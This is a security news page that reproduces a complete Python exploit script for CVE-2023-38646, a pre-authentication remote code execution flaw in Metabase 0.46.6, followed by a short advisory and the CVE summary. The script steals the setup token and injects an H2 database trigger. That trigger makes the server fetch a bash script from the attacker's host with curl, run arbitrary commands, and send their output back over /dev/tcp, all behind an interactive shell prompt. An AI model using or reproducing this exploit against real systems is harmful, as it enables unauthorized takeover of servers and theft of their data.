Security
Headlines
HeadlinesLatestCVEs

Headline

Metabase 0.46.6 Remote Code Execution

Metabase version 0.46.6 pre-authentication remote code execution exploit.

Packet Storm
#sql#web#google#ubuntu#js#java#rce#auth#ssl
# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution# Google Dork: N/A# Date: 13-10-2023# Exploit Author: Musyoka Ian# Vendor Homepage: https://www.metabase.com/# Software Link: https://www.metabase.com/# Version: metabase 0.46.6# Tested on: Ubuntu 22.04, metabase 0.46.6# CVE : CVE-2023-38646#!/usr/bin/env python3import socketfrom http.server import HTTPServer, BaseHTTPRequestHandlerfrom typing import Anyimport requestsfrom socketserver import ThreadingMixInimport threadingimport sysimport argparsefrom termcolor import coloredfrom cmd import Cmdimport refrom base64 import b64decodeclass Termial(Cmd):    prompt = "metabase_shell > "    def default(self,args):        shell(args)class Handler(BaseHTTPRequestHandler):    def do_GET(self):        global success        if self.path == "/exploitable":                        self.send_response(200)            self.end_headers()            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())            success = True        else:            print(self.path)            #sys.exit(1)    def log_message(self, format: str, *args: Any) -> None:        return Noneclass Server(HTTPServer):    passdef run():    global httpserver    httpserver = Server(("0.0.0.0", argument.sport), Handler)    httpserver.serve_forever()def exploit():    global success, setup_token    print(colored("[*] Retriving setup token", "green"))    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)    print(colored(f"[+] Setup token: {setup_token}", "green"))    print(colored("[*] Tesing if metabase is vulnerable", "green"))    payload = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-musyoka",                "engine": "h2"                }                }    timer = 0    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))    thread = threading.Thread(target=run, )    thread.start()    while timer != 120:        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)        if success == True :            print(colored("[+] Metabase version seems exploitable", "green"))            break        elif timer == 120:            print(colored("[-] Service does not seem exploitable exiting ......", "red"))            sys.exit(1)    print(colored("[+] Exploiting the server", "red"))        terminal = Termial()    terminal.cmdloop()def shell(command):    global setup_token, payload2    payload2 = {        "token": setup_token,        "details":        {            "is_on_demand": False,            "is_full_sync": False,            "is_sample": False,            "cache_ttl": None,            "refingerprint": False,            "auto_run_queries": True,            "schedules":            {},            "details":            {                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",                "advanced-options": False,                "ssl": True                },                "name": "an-sec-research-team",                "engine": "h2"                }                }        output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)    bind_thread = threading.Thread(target=bind_function, )    bind_thread.start()    #updating the payload    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"    requests.post(f"{argument.url}/api/setup/validate", json=payload2)    #print(output.text)def bind_function():    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.bind(("0.0.0.0", argument.lport))        sock.listen()        conn, addr = sock.accept()        data = conn.recv(10240).decode("ascii")        print(f"\n{(b64decode(data)).decode()}")    except Exception as ex:        print(colored(f"[-] Error: {ex}", "red"))        pass    if __name__ == "__main__":    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)    argument  = args.parse_args()    if argument.url.endswith("/"):        argument.url = argument.url[:-1]    success = False    exploit()

Related news

Major Security Flaw Discovered in Metabase BI Software – Urgent Update Required

Users of Metabase, a popular business intelligence and data visualization software package, are being advised to update to the latest version following the discovery of an "extremely severe" flaw that could result in pre-authenticated remote code execution on affected installations. Tracked as CVE-2023-38646, the issue impacts open-source editions prior to 0.46.6.1 and Metabase Enterprise

CVE-2023-38646

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution